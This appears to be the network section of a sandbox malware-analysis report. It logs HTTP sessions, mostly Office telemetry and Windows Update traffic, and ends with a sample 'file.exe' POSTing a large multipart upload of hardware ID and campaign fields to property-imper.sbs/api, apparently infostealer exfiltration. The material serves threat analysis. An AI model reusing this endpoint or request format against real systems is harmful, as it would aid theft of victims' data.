                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8e735b52aabac327-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1486&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2149&delivery_rate=1901041&cwnd=189&unsent_bytes=0&cid=5fde2842171e2e39&ts=749&x=0"
                                                                                                                                                                                  2024-11-23 18:52:31 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                  Data Ascii: eok 8.46.123.75
                                                                                                                                                                                  2024-11-23 18:52:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  25192.168.2.74972513.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:30 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:30 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 464
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                  ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                  x-ms-request-id: d05e48d4-001e-0065-1c06-3d0b73000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185230Z-178bfbc474bscnbchC1NYCe7eg000000053g000000001cdf
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:30 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  26192.168.2.74972613.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:30 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:30 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 494
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                  x-ms-request-id: df770720-601e-0002-4a47-3ca786000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185230Z-178bfbc474bbbqrhhC1NYCvw74000000050g00000000a52w
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:30 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  27192.168.2.74973013.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:31 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:32 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 419
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                  ETag: "0x8DC582B9748630E"
                                                                                                                                                                                  x-ms-request-id: feb62e3a-f01e-0085-1d2f-3c88ea000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185232Z-178bfbc474bp8mkvhC1NYCzqnn00000004sg0000000046b8
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:32 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  28192.168.2.74973113.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:32 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:32 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 472
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                  ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                  x-ms-request-id: 7a05741d-701e-0021-0754-3c3d45000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185232Z-15b8b599d88cn5thhC1TEBqxkn000000035g00000000e8y2
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:32 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  29192.168.2.74973213.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:32 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:32 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 404
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                  ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                  x-ms-request-id: f19b5380-801e-0015-2749-3cf97f000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185232Z-15b8b599d88pxmdghC1TEBux9c00000003hg000000002gpw
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:33 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  30192.168.2.74973313.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:32 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:33 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                  ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                  x-ms-request-id: babf4520-701e-005c-6e46-3cbb94000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185233Z-178bfbc474bh5zbqhC1NYCkdug00000004vg000000003wbg
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:33 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  31192.168.2.74973413.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:33 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:33 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 428
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                  ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                  x-ms-request-id: 57389be4-e01e-0003-606c-3c0fa8000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185233Z-174c587ffdfgcs66hC1TEB69cs000000037000000000918r
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:33 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  32192.168.2.7497274.175.87.197443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:33 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=uOAVrAAkXHMSHAx&MD=G22mkc+C HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                  Host: slscr.update.microsoft.com
                                                                                                                                                                                  2024-11-23 18:52:34 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                  Expires: -1
                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                  ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                  MS-CorrelationId: 3b33e728-37ca-49b3-96ed-8a0111fd2075
                                                                                                                                                                                  MS-RequestId: 3fa04012-4eea-4e0a-8dc7-97bf03f8118b
                                                                                                                                                                                  MS-CV: ENQtrPSEBU69IsbZ.0
                                                                                                                                                                                  X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                  Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:32 GMT
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Content-Length: 24490
                                                                                                                                                                                  2024-11-23 18:52:34 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                  Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                  2024-11-23 18:52:34 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                  Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  33192.168.2.749737104.21.33.1164436908C:\Users\user\Desktop\file.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:34 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=FPHK5MD6PS
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                  Content-Length: 585973
                                                                                                                                                                                  Host: property-imper.sbs
                                                                                                                                                                                  2024-11-23 18:52:34 UTC15331OUTData Raw: 2d 2d 46 50 48 4b 35 4d 44 36 50 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 43 34 33 42 39 38 37 42 32 38 45 37 34 32 44 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 46 50 48 4b 35 4d 44 36 50 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 46 50 48 4b 35 4d 44 36 50 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 46 50 48 4b 35 4d 44 36 50 53 0d 0a 43 6f
                                                                                                                                                                                  Data Ascii: --FPHK5MD6PSContent-Disposition: form-data; name="hwid"0C43B987B28E742DD7CBBD6DF28D3732--FPHK5MD6PSContent-Disposition: form-data; name="pid"1--FPHK5MD6PSContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--FPHK5MD6PSCo
